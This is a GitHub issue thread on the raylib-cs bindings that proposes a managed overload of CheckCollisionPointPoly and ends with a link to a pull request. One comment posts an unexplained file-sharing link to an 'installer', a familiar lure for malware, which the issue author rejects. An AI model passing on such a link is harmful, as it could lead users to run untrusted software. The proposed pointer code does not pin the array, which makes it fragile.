### ISSUE TITLE
No good Managed way to Call CheckCollisionPointPoly

### ISSUE THREAD

**Issue by AlexanderBaggett** [chrisdill/raylib-cs#267]
Before submitting a new issue, please verify and check:

 - [x] The issue is specific to Raylib-cs and not raylib
 - [x] I checked there is no similar issue already reported
 - [x] My code has no errors or misuse of Raylib-cs

### Issue description

Basically People who aren't very interop savy will have a hard time using this method.
It's just not very useful as is.

### Environment

Windows

### Code example

I wanted to propose an implementation.

    public static CBool CheckCollisionPointPoly(Vector2 point, Vector2[] points)
    {
        var pointsPtr = (Vector2*)Unsafe.AsPointer<Vector2>(ref MemoryMarshal.GetArrayDataReference(points));
        return CheckCollisionPointPoly(point, pointsPtr, points.Length);
    }

**Comment by gabriel-mauricioo** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by AlexanderBaggett** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

You like sending random zip files to people on the internet. No way in hell I am opening that.

**Comment by AlexanderBaggett** [comment]
I created a pull request for this:
https://github.com/chrisdill/raylib-cs/pull/268
